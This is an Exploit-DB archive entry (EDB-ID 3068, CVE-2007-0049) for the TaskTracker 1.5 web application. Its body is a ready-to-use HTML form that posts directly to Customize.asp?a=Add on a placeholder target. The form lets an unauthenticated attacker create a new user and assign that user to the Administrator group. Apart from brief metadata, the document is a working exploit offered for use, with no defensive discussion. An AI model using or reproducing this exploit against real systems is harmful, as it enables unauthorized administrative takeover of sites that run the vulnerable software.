TaskTracker <= 1.5 Customize.asp Remote Add Administrator Exploit

2007-01-01T00:00:00
ID EDB-ID:3068
Type exploitdb
Reporter ajann
Modified 2007-01-01T00:00:00

Description

TaskTracker <= 1.5 (Customize.asp) Remote Add Administrator Exploit. CVE-2007-0049. Webapps exploit for asp platform

                                        
                                            &lt;!--

*******************************************************************************
# Title   :  TaskTracker All Version Remote Add Admin Exploit
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.geckovich.com
# $$      :  $39.99 - $19.99

*******************************************************************************

--&gt;

&lt;FORM NAME="AddUser" METHOD="POST" ACTION="http://[target]/[path]/Customize.asp?a=Add" style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;
	&lt;td valign=top class='data3'&gt;
       	&lt;input type=text size="1" name="Name" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE=""&gt;
	&lt;/td&gt;
	&lt;td valign=top class='data3'&gt;
		&lt;input type=text size="1" name="Email" class=textboxes style='width:200; height:17; font-size: 10px;' VALUE=""&gt;
	&lt;/td&gt;
	&lt;td valign=top class='data3'&gt;
		&lt;input type=text size="1" name="UserName" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE=""&gt;

	&lt;/td&gt;
	&lt;td valign=top class='data3'&gt;
		&lt;input type=text size="1" name="Password" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE=""&gt;
	&lt;/td&gt;
	&lt;td valign=top class='data3'&gt;
		&lt;select name="GroupID" class="selectedtextboxes"&gt;
			&lt;option value="1"&gt;Publisher&lt;/option&gt;
			&lt;option value="2"&gt;Editor&lt;/option&gt;

			&lt;option value="3"&gt;Administrator&lt;/option&gt;
		&lt;/select&gt;
	&lt;/td&gt;
	&lt;td valign=middle class='data3' align="center" colspan="2" align="center"&gt;
    	&lt;input type="submit" value="Gonder"&gt;
    	&lt;/form&gt;

# milw0rm.com [2007-01-01]